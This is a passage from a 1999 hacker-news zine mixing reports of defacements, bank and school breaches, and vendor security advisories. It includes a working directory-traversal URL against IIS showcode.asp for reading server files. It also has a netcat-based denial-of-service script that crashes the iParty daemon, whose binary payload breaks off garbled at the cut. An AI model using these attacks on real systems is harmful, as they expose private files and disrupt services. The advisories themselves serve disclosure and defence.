parts in imperfect English, on the DOE's site: "Protest U.S.A.'s Nazi action! Protest NATO's brutal action! We are Chinese hackers who take no cares about politics. But we can not stand by seeing our Chinese reporters been killed which you might have know. Whatever the purpose is, NATO led by U.S.A. must take abosolute responsibility. You have owed Chinese people a bloody debt which you must pay for. We won't stop attacking until the war stops!" NATO bombed the Chinese Embassy in Belgrade on Saturday, killing three people, including at least one journalist. U.S. and NATO officials said the bombing was an accident caused by reliance on an outdated map. At Interior, Ahearn said hackers sabotaged the home page about 10 p.m. Sunday, replacing photographs and information with "pictures of Asian people and Chinese writing." It took about five hours to take the page off the Web, restore data and bring it back on line. Another federal Web site ­ Recreation.gov ­ was hit April 30 and was down until May 3, Ahearn said. The White House Web site was shut down Monday night after attempts were made Monday morning to hack into the system. White House spokesman Barry Toiv said it was shut down through last night to try to determine whether hackers tampered with the White House computer system. Toiv said he did not know who was responsible. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 05.0 "The Egg" `Cracked'. ~~~~~~~~~~~~~~~~~~~~ The Egg, Cracked From HNN http://www.hackernews.com/ contributed by Code Kid A UK internet savings bank known as the Egg, owned by Prudential, was the victim of a security flaw that allowed some users to see other users confidential financial information. The article goes on to explain a classic example of poor implementation. Just because they use encryption does not mean that they are secure. The bank claims that they have solved the problem. BBC http://news.bbc.co.uk/hi/english/business/the_company_file/newsid_337000/337975.stm Business: The Company File Crack in Egg's security It's security, but not as you'd want it UK Internet savings bank Egg, owned by Prudential, has rushed to close a security flaw that allowed some users to see other potential savers' confidential financial information. Egg did not make the security flaw public, but BBC News Online was alerted to the problem by two of its readers. One of them called the lack of security "very worrying". New site with flaws The fault developed 10 days ago when Egg moved its operations fully to the Internet and relaunched its Website with new technology. Several people who tried to apply online for an Egg account, suddenly saw somebody else's application flash up on the screen - including confidential information like home address, phone numbers, e-mail address, the amount of money to be invested and other details. Two shocked customers alerted Egg to the problem, whose IT team then desperately tried to track down the fault. Peter Marsden, IT director at Egg, told BBC News Online that the flaw was corrected during the afternoon of the same day. Encryption breaches security Ironically, the problem was triggered by Egg's own security measures. People who try to apply for an Egg account are asked to log on to the system by identifying themselves with their e-mail address and a password. This information is then encrypted and used to 'log the session', i.e. make sure that the computer makes the right connection between the Internet user and its own electronic records. However, the new system was not configured to cope with long e-mail addresses. Every e-mail address longer than about 30 letters was automatically truncated. Because of the encryption process, people with long, albeit very different e-mail addresses, could end up with identical IDs. The flaw became apparent when, for example, mandatory sections in the application form were not filled in correctly and Egg's web server sent back the page demanding additional information. At this point, a page containing confidential information could be sent to somebody else with the identical ID. If hackers had been aware of the security flaw, they could have deliberately flooded Egg's servers, identifying themselves with long, but false e-mail addresses, hoping to glean personal information of Egg customers. Egg has now ironed out the problem and changed the system so it can cope with e-mail addresses of any length. Online, and growing The Egg savings account has been a phenomenal success, exceeding the wildest expectations of parent company Prudential. Within six months the company managed to reach its five-year target, with 500,000 customers who have put £5bn in its accounts. To help its customers to get online, the Egg has launched a free Internet access service, similar to Dixon's succesful Freeserve. However, the success has come at a price. The Egg venture is losing millions, and Prudential does not expect it to make money for some years. @HWA 06.0 Student changes grades ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Student Changes Grades contributed by Weld Pond An unidentified student of Douglas County High School has admitted to breaking into the schools computer system and changing the grades of four students. Sgt. Attila Denes, spokesman for the Douglas County sheriff called their technique "ingenious". Of course the article does not give any technical details. The student has been suspended for 10 days, may face expulsion and criminal charges including forgery, use of forged academic records and criminal tampering. Inside Denver http://insidedenver.com/news/0507hack1.shtml Boy admits altering Douglas High grades By Tillie Fong Denver Rocky Mountain News Staff Writer CASTLE ROCK -- Four Douglas County High School students decided last month they could hack their way into better grades, authorities said Thursday. One 16-year-old boy broke into the school's record system and raised some low marks. "The technique they used was ingenious," said Sgt. Attila Denes, spokesman for the Douglas County sheriff. The hacker figured out a way to get access to records via the school's library computer and fax machine. He also used commercially available software to obtain the password. The boy apparently got into the system at least 30 times starting in mid-April. "He changed an average of two to three grades for each student and changed the failing or near failing grades to A's and B's," Denes said. On April 30, school employee Joan Elderton noticed that several changes were made to four students' grades without authorization, and notified assistant principal Ron England. Bruce Caughey, spokesman for Douglas County schools, said one of the things that gave the hacker away was the time and date log the computer system keeps. "School officials were able to determine when the changes were made," he said. That same day, administrators called in the hacker and his father. "The student initially denied everything," Denes said. But the following Monday, he submitted a letter to school officials in which he admitted making the changes and described how he did it. At that time, he also said he had altered the grades for three other students. "The school administrator subsequently talked to the other three boys, and they each said that they had asked this other boy to change the grades on their behalf," Denes said. Since then, the hacker has been suspended for 10 days, and the other three students for five days. They also face criminal charges, and possible expulsion. Possible charges against the hacker include forgery, use of forged academic records and criminal tampering. The other three boys are looking at criminal solicitation and use of forged academic records charges. None of the boys was named because of their age. "The students showed quite a bit of resourcefulness," said Denes. "It's too bad it couldn't have been channeled more positively." May 7, 1999 @HWA 07.0 IBM's Gift To Australia's Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ IBMs Gift to Australias Security contributed by photon It is hard to tell if it is the person being written about or the reporter doing the writing but this "news article" makes it seem that Guy Denton was sent from IBM to save all of Australia from cyber attacks. A prime example of sensationalistic advertising hiding as "news". The Sydney Morning Herald http://www.smh.com.au/news/9905/08/text/national4.html Hacker tracker plays a risky game Date: 08/05/99 By JAMES WOODFORD, Science Writer Guy Denton is the hackers' policeman, the keeper of knowledge so central to our society that should he change sides he would be one of the most dangerous men on Earth. His job is to enter other people's computer systems, detect the presence of illegal hackers, prevent systems from being attacked and to slowly - when students have proven they can be trusted - teach a new generation of "ethical" hackers how to hunt down bad guys in cyberspace. An ethical hacker is a computer expert who legally enters clients' computer systems searching for chinks in security. Mr Denton said hacking is the "getting of any information that you do not have the right to see". It is also the wreaking of havoc within computer systems by entering and changing codes so that a company or bureaucracy's business is disrupted. Mr Denton, 40, an American, is in Australia to take a new crop of IBM recruits to higher levels of anti-hacking skills. The company searches for talented university graduates with the right skills to become professional ethical hackers with the right psychological makeup to ensure that the skills they are taught are not misused. Mr Peter Watson, an ethical hacker also with IBM, said: "We tend to stay away from people who hold themselves out as hackers. "But we look for certain personality traits - puzzle-solving ability, inquisitiveness - people who are not comfortable until they have been all the way through something. "They are people who have got to have the full picture." They are also young - most, said Mr Watson, were in their mid-20s. "If you look back through history we have always had things like the Silk Road," Mr Watson said. "They were always exposed to bandits and pirates and you are really just seeing our trade routes moved to an electronic basis. "We are the security guards of the Internet." The Australian team of ethical hackers - their numbers are a closely guarded secret - work out of a darkened room on Sydney's Lower North Shore with a bank of computers from where just about any computer system in the world can be accessed. Companies concerned about the security of their systems pay a fee of between $15,000 and $40,000 plus costs to allow the ethical hackers to break into their network. "In some circumstances they don't tell their computer system administrators that there is a hack going on," Mr Denton said. Once the ethical hackers have entered the system they then wait to see how long it takes for their presence to be detected or whether once it is detected proper procedures are followed. If the "attack" is not detected at all, then advice is given to the client on the installation of a "warning intrusion alarm system" or an upgrading of security. "The level of activity is occurring a lot more," Mr Watson said. "We are starting to see a lot of activity." Until recently most hacking activity in Australia tended to take place after hours, when people had left work or university students had finished their day's study. However, as more people from overseas are realising that Australia is a promising hacking target, the intrusions are occurring more on a 24-hour basis as people dial in from places like the United States. Hackers are able to access a company's computer system by calling in externally and then using programs to actually enter the systems. Advice on how to enter computer systems is readily available on the Internet and magazines give tips on how to enter various systems. Computer hacking programs are also now being sold illegally. However, in spite of the increasing sophistication being employed by hackers, by far the biggest volume of intrusions are what are described as "script kiddies". The greatest fear for the ethical hacker is the anonymous computer whiz or somebody hell bent on mischief working from within. "A rogue employee typically does not make themselves known," said Mr Denton. The ethical hackers acknowledge that their work gives them the power to cause huge problems for society and have to work ensuring that the staff they train do not cross the line to illegality. "I could cause a huge amount of chaos," Mr Denton said. "But I am not going to do that. "We have to be sure that our guys are not going to get bored and do things they are not supposed to do." @HWA 08.0 SCREAM busted ~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by scream SCREAM Busted Last Friday HNN reported that S C R E A M a member of H.A.R.P (Hackers Against Racist Parties) and well known for his fight against racism and fascism had been apprehended by law enforcement. HNN has received confirmation of this earlier report. The FBI questioned SCREAM for 27 hours about 26 different security breaches and his ethics on hate-groups. It is unknown if he has been charged with a crime. @HWA 09.0 Corel Hacked ~~~~~~~~~~~~ From http://www.net-security.org/ COREL HACKED by BHZ, Tuesday 11th May 1999 on 5:10 pm CET Several of Corel domains have been compromised by Team Sploit. Hackers convict NATO attack on Chinese embassy in Belgrade. "whew. when i heard the news about NATO bombing the Chinese embassy in Serbia, i thought heaven was falling down... ^Oh, sorry, it was a mistake", was the explanation we heard from NATO spokesmen^". See archive of www.corel.com below http://www.net-security.org/spec/hack/corel.com.htm @HWA 10.0 G0at Security calls it quits ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ G0AT QUITS by BHZ, Tuesday 11th May 1999 on 2:58 pm CET G0at security is officially finished. They had some problems (including wiping of their server, fights between members, taking of their EffNet channel #feed-the-goats...). Their earlier hacks are stored on Attrition mirror. Read finishing statement by Debris below /////////////////////////////////////////// GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT G O O A A TT G GGG O O AAAAAAAA TT G G O O A A TT GGGGGG OOOOOOO A A TT \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Due to recent events, the downfall of g0at security has become imminent. These incidents include: - Legal problems of some of our members. - Recent hacking crack downs launched by many governments. - The recent takeover of our channel, #feed-the-goats (Efnet). - Losing our server due to a sloppy hack by one of our members (/me looks away). - Losing our text files due to our domain being wiped off the server. - Fights and dissapearances of some of our members. - The maturing of our members. g0at security hereby announces it's closure. By this we do not mean we are going legit, we are finished. Unlike other groups we most likely will not spawn back. [Brief history of g0at security] One day in Feb. I believe, ech0 and myself (Debris), decided to irc. ech0 informed me that occasionally hung out in a channel he, himself created called #feed-the-goats. From there, members of a popular group, HcV along with members of Global Hell, began coming. ech0 and myself decided that we wanted to be as elite as our peers in #rootworm, so we made a webpage. The purpose of the page was to mock and satirize hacker culture in general. Our first document entitled "g0at declares war on LoU" mocked the Legion of the Underground's new attempt at becoming legit among a handful of other aspects of their organization. Our original url (goat.sphix.com) quickly grew in size and popularity, and our channel became more populated. The hacks began soon after, some by members and a lot by non-members. g0at's highpoint came soon after the controversial yahoo hack. Our popularity skyrocketted and the name g0at became known to all (unfortunatly we got all the l33t0s in our channel and wouldn't go away). The fun and games continued up until April, when all the 'incidents' began. Then May was the last straw. [Where do we go from here] Most members will most likely go their own ways. Many still hang in #feed-the-goatz (our new channel). No more text releases will come from g0at, our webpage will remain down, our archive on attrition.org will stay the same and nothing will be heard of us as a group. [Thanks and greets] Thanks to all that supported our group and enjoyed the text we wrote to amuse the unintelligent. Greets to all our 12 members, HNN, attrition, net-security, HWA.hax0r.news. JP, for entertaining us for hours with your hacker journalism. And thanks to all the rest. Finally.... it's been fun. It's been awesome being associated with g0at. You can still reach us at g0at@attrition.org for further questions or comments or whatever (I just want email) g0at--------------------------------------------------------------------------------------------- []=Debris=[] debris@attrition.org @HWA 11.0 Guninski uncovers yet another browser bug ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ ANOTHER BROWSER VULNERABILITY by BHZ, Tuesday 11th May 1999 on 2:52 pm CET Georgi Guninski reports another browser bug to BugTraq: "There is a design flaw in both Internet Explorer 5.0 and Netscape Communicator 4.51 Win95 (guess all 4.x versions of both browsers are vulnerable too) in the way they handle bookmarks. The problem arises if the user bookmarks (adds to favorites) and later chooses a specially designed javascript: URL. When the bookmark is chosen later, the JavaScript code in it is executed in the context (the same domain and protocol) of the document opened prior to choosing the bookmark. So, the JavaScript code has access to documents in the same domain. An interesting case is choosing the bookmark when the active document is a local file (the protocol is "file:") - then the JavaScript code has access to local files and directories". @HWA 12.0 Freaky to do a Macintosh related speech at Defcon7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ FREAKY'S DEFCON7 SPEACH by LucasAr, Tuesday 11th May 1999 on 2:30 pm CET As you probably know Freaky will be giving a first time ever Macintosh security related speech on DEFCON7. You can read his announcement and the topics he plans to address below, and I urge you to visit Freaks Macintosh Archives. http://freaky.staticusers.net/ Freaks Macintosh Archives Author Freaky will be speaking at this years Hacker Convention located in Las Vegas, NV called DefCon 7 This is the first speach of its kind dealing with the MacOS and its security. We plan on covering the following topics: Macintosh Security Products: OnGuard, FileGuard, Screen 2 Screen, FoolProof, AtEase Macintosh Underground Products: Such as programs to destruct a security product or cause another computer to crash (Denial of Service Attack) We will also cover how macs are vulnerable to DoS attacks. And release new programs for the Mac Platforms. Freaks Macintosh Archives http://freaky.staticusers.net/ @HWA 13.0 IIS 2.0 "Security" by p0lix ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Originally posted on http://www.403-security.org/ IIS 2.0 "Security" Microsoft is wrestling with security holes in its Site Server and Internet Information Server (IIS) products that expose system files -- including potentially sensitive Internet-commerce customer files or databases -- through any remote web browser. The flaws, discovered by members of l0pht are caused from default configurations that install three active server pages without proper access control list settings. LOpht has warned that E-commerce server information -- including transaction logs, credit card numbers, and other customer information -- are potentially at risk. "There is even E-commerce shopping cart software that stores administrative passwords in simple text files," LOpht warned. Using these active server pages -- viewcode.asp, codebrws.asp, and showcode.asp -- someone could view sensitive or compromising information from that system. The problem affects Versions 3.x of Site Server and 4.x of IIS; both are used in E-commerce infrastructures. It's bad if you've got an e-commerce database installed on that system, because almost anyone can use Active Server Pages to locate databases and get into database information, and you can also view the source code of HTML pages. A WebTrends engineer found that the holes were so wide he could use them on an Internet search engine and determine what servers were similarly configured. He was able to view the parameters of any file and you can get information that will lead you through all the systems throughout the network. Microsoft officials were working on new versions of the tools to correct the vulnerability, which security product manager Scott Culp said should be complete by early next week, and planned to issue a security bulletin on the issues Friday afternoon. In the meantime, potential workarounds include checking the Active Server Pages settings, or deleting the tools altogether. As a Web site operator, you want to give customers the opportunity to look at the code on their page, however, this vulnerability allows somebody to misuse these tools to possibly look at other files on the server. For more information visit the l0pht web site at http://www.l0pht.com -p0liX (p0lix@403-security.org) @HWA 14.0 l0pht Security Advisory on MS IIS 4.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ L0pht Security Advisory ------------- URL Origin: http://www.l0pht.com/advisories.html Release Date: May 7th, 1999 Application: Microsoft IIS 4.0 Web Server Severity: Web users can view ASP source code and other sensitive files on the web server Author: weld@l0pht.com Operating Sys: Microsoft NT Server 4.0 -------------- I. Description Internet Information Server (IIS) 4.0 ships with a set of sample files to help web developers learn about Active Server Pages (ASP). One of these sample files, showcode.asp, is designed to view the source code of the sample applications via a web browser. The showcode.asp file does inadequate security checking and allows anyone with a web browser to view the contents of any text file on the web server. This includes files that are outside of the document root of the web server. Many ecommerce web servers store transaction logs and other customer information such as credit card numbers, shipping addresses, and purchase information in text files on the web server. This is the type of data that could be accessed with this vulnerability. The L0pht would like to thank Parcens for doing the initial research on this problem. II. Details The showcode.asp file is installed by default at the URL: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp It takes 1 argument in the URL, which is the file to view. The format of this argument is: source=/path/filename So to view the contents of the showcode.asp file itself the URL would be: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp This looks like a fairly dangerous sample file. It can view the contents of files on the system. The author of the ASP file added a security check to only allow the viewing of the sample files which were in the '/msadc' directory on the system. The problem is the security check does not test for the '..' characters within the URL. The only checking done is if the URL contains the string '/msadc/'. This allows URLs to be created that view, not only files outside of the samples directory, but files anywhere on the entire file system that the web server's document root is on. For example, a URL that will view the contents of the boot.ini file, which is in the root directory of an NT system is: http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../../boot.ini This URL requires that IIS 4.0 was installed in its default location. III. Solution For production servers, sample files should never be installed so delete the entire /msadc/samples directory. If you must have the showcode.asp capability on development servers the showcode.asp file should be modified to test for URLs with '..' in them and deny those requests. For specific questions about this advisory, please contact weld@l0pht.com --------------- For more L0pht (that's L - zero - P - H - T) advisories check out: http://www.l0pht.com/advisories.html --------------- @HWA 15.0 X-Force Security advisory on Oracle 8: Multiple file system vulnerabilties ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ISS Security Advisory May 6, 1999 Multiple File System Vulnerabilities in Oracle 8 Synopsis: Internet Security Systems (ISS) X-Force has discovered that multiple vulnerabilities exist in Oracle 8 that may allow local attackers to exploit weaknesses in Oracle administrative tools. Oracle is the market leader in enterprise database solutions. Attackers may use these vulnerabilities to amplify their privilege to that of the 'oracle' user. By default, the oracle user controls the entire Oracle database system. Attackers may launch local denial of service attacks against the database as well as alter or manipulate data. Affected Versions: ISS X-Force has determined that most current versions of Oracle 8 for Unix are vulnerable. These versions include 8.03, 8.04, 8.05, and 8.15. Oracle 8 for Windows NT is not affected by these vulnerabilities. Description: The Oracle 8 distribution is shipped with many administrative utilities that are owned by the oracle user with the setuid bit enabled. Several of these utilities implement insecure file creation and manipulation. These utilities also trust Oracle-related environment variables. The combined effect of these vulnerabilities may allow local attackers to create, append to, or overwrite privileged oracle files. Certain vulnerabilities exist that may allow local attackers to execute arbitrary commands as the oracle user. Attackers may also be able to permanently elevate their privilege to that of the oracle user. Temporary files that follow symbolic links are a common source of vulnerabilities in setuid executables. Administrators should remove or restrict access to setuid executables if possible. Developers of setuid programs need to take special precautions to prevent the introduction of vulnerabilities of this nature. ISS X-Force recommends that all Unix developers become familiar with Matt Bishop's secure programming guide, available at http://olympus.cs.ucdavis.edu/~bishop/secprog.html Fix Information: ISS X-Force has worked with Oracle to provide a patch for the vulnerabilities described in this advisory. Oracle has provided the following FAQ to answer any questions concerning these vulnerabilities. Q: I've heard about a setuid security issue with the Oracle database? What is this all about? A: On Unix platforms, some executable files have the setuid bit on. It may be possible for a very knowledgeable user to use these executables to bypass your system security by elevating their operating system privileges to that of the Oracle user. Q: Which releases are affected by this problem? A: This problem affects Oracle data server releases 8.03, 8.0.4, 8.0.5, and 8.1.5 on Unix platforms only. Q: Can I correct this problem or do I need a patch? A: This problem can easily be corrected. The customer can download the patch from the Oracle MetaLink webpages at http://www.oracle.com/support/elec_sup. The patch is a Unix shell script. This shell script should be run immediately, and also run after each relink of Oracle. Q: What is Oracle doing to fix this problem? A: Effective immediately, Oracle will provide the patch on Oracle's Worldwide Support Web pages. Oracle will ensure the patches are incorporated into future releases of Oracle8i (8.1.6) and Oracle8.0 (8.0.6) Q: What is Oracle doing to notify users about this problem now? A: Oracle is notifying all supported customers, via the Oracle Worldwide Support Web pages, of this issue so they can address it as required. ISS X-Force also recommends that all administrators complete a proactive survey on the use or potential misuse of setuid bits on privileged executables on their systems. Credits: These vulnerabilities were primarily researched by Dan Ingevaldson of the ISS X-Force. ________ Copyright (c) 1999 by Internet Security Systems, Inc. Permission is hereby granted for the electronic redistribution of this Security Alert. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert Summary in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission. About ISS ISS is the pioneer and leading provider of adaptive network security software delivering enterprise-wide information protection solutions. ISS' award-winning SAFEsuite family of products enables information risk management within intranet, extranet and electronic commerce environments. By combining proactive vulnerability detection with real-time intrusion detection and response, ISS' adaptive security approach creates a flexible cycle of continuous security improvement, including security policy implementation and enforcement. ISS SAFEsuite solutions strengthen the security of existing systems and have dramatically improved the security posture for organizations worldwide, making ISS a trusted security advisor for firms in the Global 2000, 21 of the 25 largest U.S. commercial banks and over 35 governmental agencies. For more information, call ISS at 678-443-6000 or 800-776-2362 or visit the ISS Web site at www.iss.net. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html as well as on MIT's PGP key server and PGP.com's key server. Please send suggestions, updates, and comments to: X-Force of Internet Security Systems, Inc. -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: noconv iQCVAwUBNzLwJzRfJiV99eG9AQFDHwP/U4iParVoaPwPea8i+mXciMELGUDga2UM Iyk6T6poQ9G3ASefs+v6Lm509xDeGCcPTi1MB7SvzUBb1vx95yOhu4M9CJHWOTCJ 3/ZlpV1Zdc7s/+N0ACxFNPozOmQvpT3OhbJKOakNQxDg3q/VbVXcJOxJ0DBKy7Xe d0ehW7p2OqQ= =6FXz -----END PGP SIGNATURE----- @HWA 16.0 Microsoft Security Bulletin: File viewers vulnerability (MS99-13) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-013) -------------------------------------- Solution Available for File Viewers Vulnerability Originally Posted: May 7, 1999 Summary ======= Microsoft has identified a vulnerability that occurs in some file viewers that ship as part of Microsoft (r) Internet Information Server and Site Server. The vulnerability could allow a web site visitor to view, but not to change, files on the server, provided that they knew or guessed the name of each file and had access rights to it based on Windows NT ACLs. Microsoft is releasing this security bulletin to inform customers of the vulnerability and enable them to eliminate it immediately. Patches are being developed for the affected file viewers, and will be available shortly. When they are available, an update to this security bulletin will be released. Issue ===== Microsoft Site Server and Internet Information Server include tools that allow web site visitors to view selected files on the server. These are installed by default under Site Server, but must be explicitly installed under IIS. These tools are provided to allow users to view the source code of sample files as a learning exercise, and are not intended to be deployed on production web servers. The underlying problem in this vulnerability is that the tools do not restrict which files a web site visitor can view. It is important to note several important points: - These file viewers are not installed by default under IIS. They are only installed under IIS if the user chooses to install the sample web files. - This vulnerability only allows a web site visitor to view files. There is no capability through this vulnerability to change files or add files to the server. - This vulnerability does not in any way bypass the Windows NT file permission ACLs. A web site visitor could only use these tools to view files whose ACLs allows them read access. The administrator of the web server determines the specific permissions for all files on the server. - The viewers can only be used to view files on the same disk partition as the currently-displayed web page. Databases such as those used by e-commerce servers are typically stored on a different physical drive, and these would not be at risk - The web site visitor would need to know or guess the name of each file they wished to view. Specific steps that customers can take to immediately eliminate the vulnerability are discussed below in What Customers Should Do. In addition, Microsoft is developing updated versions of the file viewers and will release them shortly. While there are no reports of customers being adversely affected by this vulnerability, Microsoft is proactively releasing this bulletin to allow customers to take appropriate action to protect themselves against it. Affected Software Versions ========================== - Microsoft Site Server 3.0, which is included with Microsoft Site Server 3.0 Commerce Edition, Microsoft Commercial Internet System 2.0, and Microsoft BackOffice Server 4.0 and 4.5 - Microsoft Internet Information Server 4.0 What Microsoft is Doing ======================= Microsoft has provided this bulletin to inform customers of specific steps that they can take to immediately eliminate this vulnerability on their servers. Microsoft is developing updated file viewers that fix the problem identified, and will release an updated version of this bulletin when they are available. Microsoft also has sent this security bulletin to customers subscribing to the Microsoft Product Security Notification Service. See http://www.microsoft.com/security/services/bulletin.asp for more information about this free customer service. Microsoft has published the following Knowledge Base (KB) article on this issue: - Microsoft Knowledge Base (KB) article Q231368, Solution Available for File Viewers Vulnerability, http://support.microsoft.com/support/kb/articles/q231/3/68.asp. (Note: It might take 24 hours from the original posting of this bulletin for the KB article to be visible in the Web-based Knowledge Base.) What Customers Should Do ======================== Customers should take the following steps to eliminate the vulnerability on their web servers: - Unless the affected file viewers are specifically required on the web site, they should be removed. The following file viewers are affected: ViewCode.asp, ShowCode.asp, CodeBrws.asp and Winmsdp.exe. Depending on the specific installation, not all of these files may be present on a server. Likewise, there may be multiple copies of some files, so customers should do a full search of their servers to locate all copies. - In accordance with standard security guidelines, file permissions should always be set to enable web visitors to access only the files they need, and no others. Moreover, files that are needed by web visitors should provide the least privilege needed; for example, files that web visitors need to be able to read but not write should be set to read-only. - As a general rule, sample files and vroots should always be deleted from a web server prior to putting it into production. If they are needed, file access permissions should be used to regulate access to them as appropriate More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-013, Solution Available for File Viewers Vulnerability (The Web-posted version of this bulletin), http://www.microsoft.com/security/bulletins/ms99-013.asp. - Microsoft Knowledge Base (KB) article Q231368, Solution Available for File Viewers Vulnerability, http://support.microsoft.com/support/kb/articles/q231/3/68.asp. Obtaining Support on this Issue =============================== If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp. Acknowledgments =============== Microsoft acknowledges WebTrends (www.webtrends.com) for discovering this vulnerability and reporting it to us. Revisions ========= - May 07, 1999: Bulletin Created. For additional security-related information about Microsoft products, please visit http://www.microsoft.com/security -------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/bulletin.htm. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 17.0 iParty pooper ~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from hotmail.com (law2-f15.hotmail.com [216.32.181.15]) by netspace.org (8.8.7/8.8.7) with SMTP id NAA20477 for ; Sat, 8 May 1999 13:10:37 -0400 Received: (qmail 46545 invoked by uid 0); 8 May 1999 17:11:35 -0000 Received: from 142.169.181.31 by www.hotmail.com with HTTP; Sat, 08 May 1999 10:11:34 PDT X-Originating-IP: [142.169.181.31] Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_e6987ad_6338d761$45c2e550" Message-ID: <19990508171135.46544.qmail@hotmail.com> Date: Sat, 8 May 1999 13:11:34 EDT Reply-To: wh00t X Sender: Bugtraq List From: wh00t X Subject: iParty Daemon Vulnerability w/ Exploit Code (worse than thought?) X-cc: jaldrich@bumpkinland.com, packetstorm@genocide2600.com To: BUGTRAQ@netspace.org Content-type: text/plain; format=flowed; Hi, iParty, by Intel Experimental Technologies Department, (unofficial information source at http://www.bumpkinland.com/iparty/), is a small voice conferencing program, which includes a server daemon in the download. It is handy for quick internet voice chat, but the server can be killed by sending a large amount of extended characters to the server port, which is 6004 by default, without being logged. The daemon either crashes quietly or GPF (varies from box to box). I've been told an advisory of some sort has already been released for this particular vulnerability but I believe the matter needs further attention because: 1. While there are other newer and better voice conferencing programs out, iParty continues to be widely used. 2. This vulnerability may be worse than thought: I tested my program (attached to message) against 4 random Windows 95/98 boxes with the daemon running, and after 2 or 3 crashes in a row, on top of crashing the iParty daemon, some experienced disconnection from the internet, ICQ and/or Rnaapp.exe, and one was even forced to reboot after the Rnaapp.exe crash. Thanks, Ka-wh00t _______________________________________________________________ Get Free Email and Do More On The Web. Visit http://www.msn.comContent-Type: text/plain; name="ippooper.sh" Content-Disposition: attachment; filename="ippooper.sh" X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id SAA23880 ippooper.sh #!/bin/sh # iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom. # iParty is a cute little voice conferencing program still widely used (much to my surprise.) # Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely. # And in some circumstances, this can lead to other Windows screw-ups (incidents included internet # disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times # a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest # (only?) version of iParty/iPartyd was v1.2 # FOR EDUCATIONAL PURPOSES ONLY. if [ "$1" = "" ]; then echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)" echo "In some circumstances can also crash other Windows progs and maybe even Windows itself." echo "Maybe you'll get lucky." echo "" echo "Usage: $0 " echo "Port is probably 6004 (default port)." echo "" echo "Remember: You need netcat for this program to work." echo "If you see something similar to 'nc: command not found', get netcat." else if [ "$2" = "" ]; then echo "I said the port is probably 6004, try that." exit else rm -f ipp00p cat > ipp00p << _EOF_ $6ì]}tTÕµ?"Ìaœp/˜HÔD†0iAá½L%ÏÌ‚EBEÔð'*}ÒyÓÔ¥(3êz‹nÃuèÔj+¨°(Ö—Ö„d'‰™øZiXåËy7 ¡'``à¾½Ï 